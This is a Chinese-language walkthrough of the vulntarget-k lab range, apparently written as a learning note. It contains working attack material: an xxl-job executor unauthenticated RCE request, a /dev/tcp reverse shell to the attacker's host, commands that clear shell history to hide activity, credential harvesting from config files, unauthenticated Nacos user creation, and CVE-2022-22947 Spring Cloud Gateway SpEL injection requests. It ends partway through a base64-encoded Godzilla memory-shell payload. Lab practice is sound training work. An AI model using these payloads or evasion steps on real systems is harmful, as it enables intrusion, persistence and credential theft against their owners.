vulntarget-k打靶记录: 正式wp:https://mp.weixin.qq.com/s/LHq8O2F-r6rbhVW84Q4KEg
账号密码信息:
主机
主机账号密码
web账号密码
xxl-job-admin
xxl-job/root123
admin/Bolean@10000
nacos-springcloudgateway
spring-nacos/root123
nacos/bolean@1q2
redis
redis/redis@1z
redis密码:nbsg@123456
拓扑图:
思路: 其中外网IP我设置成了:192.168.189.130
网络配置文件为:/etc/netplan/00-installer-config.yaml
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 network: ethernets: ens33: addresses: - 192.168.189.130/24 gateway4: 192.168.189.2 dhcp4: false nameservers: addresses: - 8.8.8.8 search: - local ens37: addresses: - 192.168.100.20/24 gateway4: 192.168.100.1 dhcp4: false version: 2
首先正常的外围信息检测:
扫描工具自选,不在此展示:发现就开了4个端口 22,8080,8081,9999
其中22端口为ssh的连接端口,暂时不考虑爆破,先从web端口入手试试
分别访问三个web端口试试————web端口直接访问也并没有过多的信息。
快进到下一步:扫目录
这是8080端口的扫描结果:存在:xxl-job-admin
暂时线索断了,看看其他端口:8081端口进行目录扫描没有提供过多的信息。
9999端口:http://192.168.189.130:9999/
查询是否有相关资料:
发现可以打xxl-job-execute未授权RCE:无回显RCE
exp如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 POST /run HTTP/1.1 Host: your-ip:9999 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 365 { "jobId": 1, "executorHandler": "demoJobHandler", "executorParams": "demoJobHandler", "executorBlockStrategy": "COVER_EARLY", "executorTimeout": 0, "logId": 1, "logDateTime": 1586629003729, "glueType": "GLUE_SHELL", "glueSource": "touch /tmp/success", "glueUpdatetime": 1586699003758, "broadcastIndex": 0, "broadcastTotal": 0 }
我是直接跑的脚本:https://github.com/mrknow001/xxl-job-rce
本地监听:nc lvnp 54321
执行反弹shell:/bin/bash -i >& /dev/tcp/192.168.189.141/54321 0>&1
tips1:隐藏 反弹shell以后得到的是一个root权限,首先需要隐藏自己的后续执行的命令:
1 unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
查看开机启动服务:
1 systemctl list-unit-files --type =service|grep enabled
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 root@vulntarget-k:/home/xxl-job/xxl-jar# systemctl list-unit-files --type =service|grep enabled <stemctl list-unit-files --type =service|grep enabled accounts-daemon.service enabled apparmor.service enabled atd.service enabled autovt@.service enabled blk-availability.service enabled cloud-config.service enabled cloud-final.service enabled cloud-init-local.service enabled cloud-init.service enabled console-setup.service enabled cron.service enabled dbus-org.freedesktop.resolve1.service enabled dbus-org.freedesktop.thermald.service enabled ebtables.service enabled getty@.service enabled irqbalance.service enabled iscsi.service enabled keyboard-setup.service enabled lvm2-monitor.service enabled lxcfs.service enabled lxd-containers.service enabled mysql.service enabled networkd-dispatcher.service enabled ondemand.service enabled open-iscsi.service enabled open-vm-tools.service enabled pollinate.service enabled rsync.service enabled rsyslog.service enabled setvtrgb.service enabled snapd.aa-prompt-listener.service enabled snapd.apparmor.service enabled snapd.autoimport.service enabled snapd.core-fixup.service enabled snapd.recovery-chooser-trigger.service enabled snapd.seeded.service enabled snapd.service enabled snapd.system-shutdown.service enabled ssh.service enabled sshd.service enabled syslog.service enabled systemd-fsck-root.service enabled-runtime systemd-networkd-wait-online.service enabled systemd-networkd.service enabled systemd-resolved.service enabled systemd-timesyncd.service enabled thermald.service enabled ua-reboot-cmds.service enabled ufw.service enabled unattended-upgrades.service enabled ureadahead.service enabled vgauth.service enabled vmtoolsd.service enabled xxl-job-8080.service enabled xxl-job-9999.service enabled
在该目录下发现有两个jar包,xxl-job-executor-sample-springboot-2.2.0.jar是未授权启动的web服务,另一个应该是8080端口的xxl-job-admin的包。将他们下载下来到本地:
这里直接解压或者反编译都可以,反编译用的jadx
直接解压之后的目录结构:
tips2:search 这里文件比较多,尝试快捷收集其中对我有用的信息:tool:searchall
1 2 searchall64.exe search -p G:\桌面\假期学习笔记\tmp\vulntarget-k\xxl-job-admin-2.2.0 -s "username,password,passwd,jdbc:,ssh-,ldap:,mysqli_connect,sk-,admin,admin1,admin123,user,pass" -u
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 搜索敏感关键信息如下: File: G:\桌面\假期学习笔记\tmp\vulntarget-k\xxl-job-admin-2.2.0\BOOT-INF\classes\application.properties spring.datasource.url=jdbc:mysql://127.0.0.1:3306/xxl_job?useUnicode=true&characterEncoding=UTF-8&autoReconnect=true&serverTimezone=Asia/Shanghai spring.datasource.username=root spring.datasource.password=root_pwd spring.mail.username=xxx@qq.com spring.mail.password=xxx File: G:\桌面\假期学习笔记\tmp\vulntarget-k\xxl-job-admin-2.2.0\BOOT-INF\classes\i18n\message_en.properties user_username=Username user_password=Password File: G:\桌面\假期学习笔记\tmp\vulntarget-k\xxl-job-admin-2.2.0\BOOT-INF\classes\i18n\message_zh_CN.properties user_username=账号 user_password=密码 File: G:\桌面\假期学习笔记\tmp\vulntarget-k\xxl-job-admin-2.2.0\BOOT-INF\classes\i18n\message_zh_TC.properties user_username=帳號 user_password=密碼
可以看到我们得到了数据库的用户和密码:
1 2 3 spring.datasource.url=jdbc:mysql://127.0.0.1:3306/xxl_job?useUnicode=true&characterEncoding=UTF-8&autoReconnect=true&serverTimezone=Asia/Shanghai spring.datasource.username=root spring.datasource.password=root_pwd
tips3:交互shell 获得一个交互式shell:这样需要在linux本机做,不要用ssh远连linux来做,不然不好用连不上mysql,这样做以后我们就好像在其本地运行shell一样,还可以使用mysql
1 2 3 4 5 6 $ python3 -c 'import pty; pty.spawn("/bin/bash")' $ export SHELL=bash$ export TERM=xterm-256colorCtrl-Z $ stty raw -echo ;fg $ reset(回车)
直接登录mysql数据库:root/root_pwd,并且我们还是最高权限
我直接查询xxl_job数据库的xxl_job_user表,发现admin密码加密的,md5无法暴力破解
直接加一个用户,这里然后就能够登录后台了。然后后台还能够getshell这里就不多说了,可以看看wp来做。
上。
其实到这里我们已经拿到第一台主机的shell了。
接下来需要做这几项工作:这里不展开说归纳一手:
上传一个chfs工具,用于后续打横向方便文件之间的传输,在跳板机上搭建一个小型文件共享平台
上线msf
上传frp搭建简单的一层隧道
做完如上工作后可以开始内网的信息搜集了。
扫描192.168.100.50有如下关键端口开放:8800,8848
8848端口: nacos未授权访问漏洞
进入目录扫描:扫描出了nacos
使用默认账号密码nacos/nacos登录失败,不过根据扫描出来的信息知道这里的nacos存在未授权漏洞,可以任意添加用户。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 http://xxx.xxx.xxx.xxx:8848/nacos/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword= 可以发现以及泄露了 **ip节点** 等数据 http://xxx.xxx.xxx.xxx:8848/nacos/v1/auth/users?pageNo=1&pageSize=9 这里可以发现对用户的请求是完全没有过滤的,可以通过未授权的情况获取用户的敏感信息 那么我们可以利用未授权直接调用接口创建一个用户: 我们尝试创建用户并抓包 POST /nacos/v1/auth/users? post传参内容如下: username=peiqi&password=peiqi 返回下列内容代表创建成功 {“code”:200,”message”:”create user ok!”,”data”:null}
配置好proxychains,执行以下命令添加用户:
1 proxychains curl -XPOST 'http://192.168.100.50:8848/nacos/v1/auth/users?username=peiqi&password=peiqi' -H 'User-Agent: Nacos-Server'
成功登录以后有一些配置文件,懒得阅读,我直接全部复制下来到本地,利用searchall检索关键字:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 File: G:\桌面\假期学习笔记\tools\searchall敏感信息搜集工具\tmp\abc.txt url: jdbc:log4jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false username: root password: Pabc@234%! password: nbsg@123456 url: jdbc:log4jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false username: root password: Pabc@234%! url: jdbc:mysql://127.0.0.1:3306/xxl-job?useUnicode=true&characterEncoding=UTF-8&autoReconnect=true&serverTimezone=Asia/Shanghai username: root password: root_pwd username: xxx@qq.com password: xxx url: jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false username: root password: Pabc@234%! password: nbsg@123456 url: jdbc:log4jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false username: root password: Pabc@234%! password: nbsg@123456 url: jdbc:log4jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false username: root password: Pabc@234%! password: nbsg@123456 username: admin password: global2018#
从以上这些配置文件中得到一些密码,还有一些key(实战中可以用对应云的连接工具试试)
总结主要得到以下内容:
1 2 3 Pabc@234%! nbsg@123456 root_pwd
这里搜集到这里就差不多了。
8800端口: springboot未授权
通过目录探测就也能探测出来:http://192.168.100.50:8800/actuator/env
1 2 3 4 5 6 7 8 9 10 还有其他的不一一列出: /actuator/configprops # 显示所有@ConfigurationProperties /actuator/env # 公开 Spring 的ConfigurableEnvironment /actuator/health # 显示应用程序运行状况信息 /actuator/httptrace # 显示 HTTP 跟踪信息 /actuator/metrics # 显示当前应用程序的监控指标信息。 /actuator/mappings # 显示所有@RequestMapping路径的整理列表 /actuator/threaddump # 线程转储 /actuator/heapdump # 堆转储 /actuator/jolokia # JMX-HTTP桥,它提供了一种访问JMX beans的替代方法
这里有一个cve可以打:记录一下:CVE-2022-22947
CVE-2022-22947: 漏洞利用exp如下:
先创建一个路由,返回201表示创建成功
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 POST /actuator/gateway/routes/bolean HTTP/1.1 Host:192.168.100.50:8800 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 329 { "id": "bolean", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}" } }], "uri": "http://example.com" }
使用hackbar发包:
刷新路由:
1 2 3 4 5 6 7 8 9 10 POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.100.50:8800 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0
访问路由:
1 http://192.168.100.50:8800/actuator/gateway/routes/bolean
成功命令执行,接下来就是写shell:
写哥斯拉马的payload:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 POST /actuator/gateway/routes/bolean1 HTTP/1.1 Host: 192.168.100.50:8800 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 10956 { "id": "bolean1", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('ms.GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADQBeAoADQC2BwC3CgACALYJABIAuAoAAgC5CQASALoKAAIAuwoAEgC8CQASAL0KAA0AvggAcgcAvwcAwAcAwQcAwgoADADDCgAOAMQHAMUIAJ8HAMYHAMcKAA8AyAsAyQDKCgASALYKAA4AywgAzAcAzQoAGwDOCADPBwDQBwDRCgDSANMKANIA1AoAHgDVBwDWCACBBwCECQDXANgKANcA2QgA2goA2wDcBwDdCgAVAN4KACoA3woA2wDgCgDbAOEIAOIKAOMA5AoAFQDlCgDjAOYHAOcKAOMA6AoAMwDpCgAzAOoKABUA6wgA7AoADADtCADuCgAMAO8IAPAIAPEKAAwA8ggA8wgA9AgA9QgA9ggA9wsAFAD4EgAAAP4KAP8BAAcBAQkBAgEDCgBHAQQKABsBBQsBBgEHCgASAQgKABIBCQkAEgEKCAELCwEMAQ0KABIBDgsBDAEPCAEQBwERCgBUALYKAA0BEgoAFQETCgANALsKAFQBFAoAEgEVCgAVARYKAP8BFwcBGAoAXQC2CABlCAEZAQAFc3RvcmUBAA9MamF2YS91dGlsL01hcDsBAAlTaWduYXR1cmUBADVMamF2YS91dGlsL01hcDxMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL09iamVjdDs+OwEABHBhc3MBABJMamF2YS9sYW5nL1N0cmluZzsBAANtZDUBAAJ4YwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAOTG1zL0dNZW1TaGVsbDsBAAhkb0luamVjdAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAVcmVnaXN0ZXJIYW5kbGVyTWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA5leGVjdXRlQ29tbWFuZAEAEnJlcXVlc3RNYXBwaW5nSW5mbwEAQ0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBAANtc2cBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQADb2JqAQASTGphdmEvbGFuZy9PYmplY3Q7AQAEcGF0aAEADVN0YWNrTWFwVGFibGUHAM0HAMcBABBNZXRob2RQYXJhbWV0ZXJzAQALZGVmaW5lQ2xhc3MBABUoW0IpTGphdmEvbGFuZy9DbGFzczsBAApjbGFzc2J5dGVzAQACW0IBAA51cmxDbGFzc0xvYWRlcgEAGUxqYXZhL25ldC9VUkxDbGFzc0xvYWRlcjsBAAZtZXRob2QBAApFeGNlcHRpb25zAQABeAEAByhbQlopW0IBAAFjAQAVTGphdmF4L2NyeXB0by9DaXBoZXI7AQABcwEAAW0BAAFaBwDFBwEaAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAB1MamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEAA3JldAEADGJhc2U2NEVuY29kZQEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAdFbmNvZGVyAQAGYmFzZTY0AQARTGphdmEvbGFuZy9DbGFzczsBAAJicwEABXZhbHVlAQAMYmFzZTY0RGVjb2RlAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAB2RlY29kZXIBAANjbWQBAF0oTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTspTG9yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9SZXNwb25zZUVudGl0eTsBAAxidWZmZXJTdHJlYW0BAAJleAEABXBkYXRhAQAyTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTsBABlSdW50aW1lVmlzaWJsZUFubm90YXRpb25zAQA1TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3RhdGlvbi9Qb3N0TWFwcGluZzsBAAQvY21kAQANbGFtYmRhJGNtZCQxMQEARyhMb3JnL3NwcmluZ2ZyYW1ld29yay91dGlsL011bHRpVmFsdWVNYXA7KUxyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm87AQAGYXJyT3V0AQAfTGphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtOwEAAWYBAAJpZAEABGRhdGEBAChMb3JnL3NwcmluZ2ZyYW1ld29yay91dGlsL011bHRpVmFsdWVNYXA7AQAGcmVzdWx0AQAZTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwcAtwEACDxjbGluaXQ+AQAKU291cmNlRmlsZQEADkdNZW1TaGVsbC5qYXZhDABpAGoBABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgwAZQBmDAEbARwMAGgAZgwBHQEeDABnAJIMAGcAZgwBHwEgAQAPamF2YS9sYW5nL0NsYXNzAQAQamF2YS9sYW5nL09iamVjdAEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAQW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvDAEhASIMASMBJAEADG1zL0dNZW1TaGVsbAEAMG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZQEAEGphdmEvbGFuZy9TdHJpbmcMASUBKAcBKQwBKgErDAEsAS0BAAJvawEAE2phdmEvbGFuZy9FeGNlcHRpb24MAS4AagEABWVycm9yAQAXamF2YS9uZXQvVVJMQ2xhc3NMb2FkZXIBAAxqYXZhL25ldC9VUkwHAS8MATABMQwBMgEzDABpATQBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIHATUMATYAmQwBNwE4AQADQUVTBwEaDAE5AToBAB9qYXZheC9jcnlwdG8vc3BlYy9TZWNyZXRLZXlTcGVjDAE7ATwMAGkBPQwBPgE/DAFAAUEBAANNRDUHAUIMATkBQwwBRAFFDAFGAUcBABRqYXZhL21hdGgvQmlnSW50ZWdlcgwBSAE8DABpAUkMAR0BSgwBSwEeAQAQamF2YS51dGlsLkJhc2U2NAwBTAFNAQAKZ2V0RW5jb2RlcgwBTgEiAQAOZW5jb2RlVG9TdHJpbmcBABZzdW4ubWlzYy5CQVNFNjRFbmNvZGVyDAFPAVABAAZlbmNvZGUBAApnZXREZWNvZGVyAQAGZGVjb2RlAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2RlcgEADGRlY29kZUJ1ZmZlcgwBUQFSAQAQQm9vdHN0cmFwTWV0aG9kcw8GAVMQAVQPBwFVEACpDAFWAVcHAVgMAVkBWgEAJ29yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9SZXNwb25zZUVudGl0eQcBWwwBXAFdDABpAV4MAV8BHgcBYAwBYQFUDACcAJ0MAIkAigwAYQBiAQAHcGF5bG9hZAcBYgwBYwFUDACBAIIMAWQBZQEACnBhcmFtZXRlcnMBAB1qYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbQwBZgFnDAFoAWkMAWoBPAwAlQCWDAFoAUoMAWsBbAEAEWphdmEvdXRpbC9IYXNoTWFwAQAQM2M2ZTBiOGE5YzE1MjI0YQEAE2phdmF4L2NyeXB0by9DaXBoZXIBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQANc2V0QWNjZXNzaWJsZQEABChaKVYBAAVwYXRocwEAB0J1aWxkZXIBAAxJbm5lckNsYXNzZXMBAGAoW0xqYXZhL2xhbmcvU3RyaW5nOylMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L21ldGhvZC9SZXF1ZXN0TWFwcGluZ0luZm8kQnVpbGRlcjsBAElvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbyRCdWlsZGVyAQAFYnVpbGQBAEUoKUxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA9wcmludFN0YWNrVHJhY2UBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAVZ2V0Q29udGV4dENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAKShbTGphdmEvbmV0L1VSTDtMamF2YS9sYW5nL0NsYXNzTG9hZGVyOylWAQARamF2YS9sYW5nL0ludGVnZXIBAARUWVBFAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBAAtnZXRJbnN0YW5jZQEAKShMamF2YS9sYW5nL1N0cmluZzspTGphdmF4L2NyeXB0by9DaXBoZXI7AQAIZ2V0Qnl0ZXMBAAQoKVtCAQAXKFtCTGphdmEvbGFuZy9TdHJpbmc7KVYBAARpbml0AQAXKElMamF2YS9zZWN1cml0eS9LZXk7KVYBAAdkb0ZpbmFsAQAGKFtCKVtCAQAbamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0AQAxKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEABmxlbmd0aAEAAygpSQEABnVwZGF0ZQEAByhbQklJKVYBAAZkaWdlc3QBAAYoSVtCKVYBABUoSSlMamF2YS9sYW5nL1N0cmluZzsBAAt0b1VwcGVyQ2FzZQEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAJZ2V0TWV0aG9kAQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEAC2dldEZvcm1EYXRhAQAfKClMcmVhY3Rvci9jb3JlL3B1Ymxpc2hlci9Nb25vOwoBbQFuAQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsKABIBbwEABWFwcGx5AQAtKExtcy9HTWVtU2hlbGw7KUxqYXZhL3V0aWwvZnVuY3Rpb24vRnVuY3Rpb247AQAbcmVhY3Rvci9jb3JlL3B1Ymxpc2hlci9Nb25vAQAHZmxhdE1hcAEAPChMamF2YS91dGlsL2Z1bmN0aW9uL0Z1bmN0aW9uOylMcmVhY3Rvci9jb3JlL3B1Ymxpc2hlci9Nb25vOwEAI29yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9IdHRwU3RhdHVzAQACT0sBACVMb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL0h0dHBTdGF0dXM7AQA6KExqYXZhL2xhbmcvT2JqZWN0O0xvcmcvc3ByaW5nZnJhbWV3b3JrL2h0dHAvSHR0cFN0YXR1czspVgEACmdldE1lc3NhZ2UBACZvcmcvc3ByaW5nZnJhbWV3b3JrL3V0aWwvTXVsdGlWYWx1ZU1hcAEACGdldEZpcnN0AQANamF2YS91dGlsL01hcAEAA2dldAEAA3B1dAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAJc3Vic3RyaW5nAQAWKElJKUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvQnl0ZUFycmF5AQAEanVzdAEAMShMamF2YS9sYW5nL09iamVjdDspTHJlYWN0b3IvY29yZS9wdWJsaXNoZXIvTW9ubzsHAXAMAXEBdAwAqACpAQAiamF2YS9sYW5nL2ludm9rZS9MYW1iZGFNZXRhZmFjdG9yeQEAC21ldGFmYWN0b3J5BwF2AQAGTG9va3VwAQDMKExqYXZhL2xhbmcvaW52b2tlL01ldGhvZEhhbmRsZXMkTG9va3VwO0xqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvaW52b2tlL01ldGhvZFR5cGU7TGphdmEvbGFuZy9pbnZva2UvTWV0aG9kVHlwZTtMamF2YS9sYW5nL2ludm9rZS9NZXRob2RIYW5kbGU7TGphdmEvbGFuZy9pbnZva2UvTWV0aG9kVHlwZTspTGphdmEvbGFuZy9pbnZva2UvQ2FsbFNpdGU7BwF3AQAlamF2YS9sYW5nL2ludm9rZS9NZXRob2RIYW5kbGVzJExvb2t1cAEAHmphdmEvbGFuZy9pbnZva2UvTWV0aG9kSGFuZGxlcwAhABIADQAAAAQACQBhAGIAAQBjAAAAAgBkAAkAZQBmAAAACQBnAGYAAAAJAGgAZgAAAAoAAQBpAGoAAQBrAAAALwABAAEAAAAFKrcAAbEAAAACAGwAAAAGAAEAAAAWAG0AAAAMAAEAAAAFAG4AbwAAAAkAcABxAAIAawAAAUgABwAG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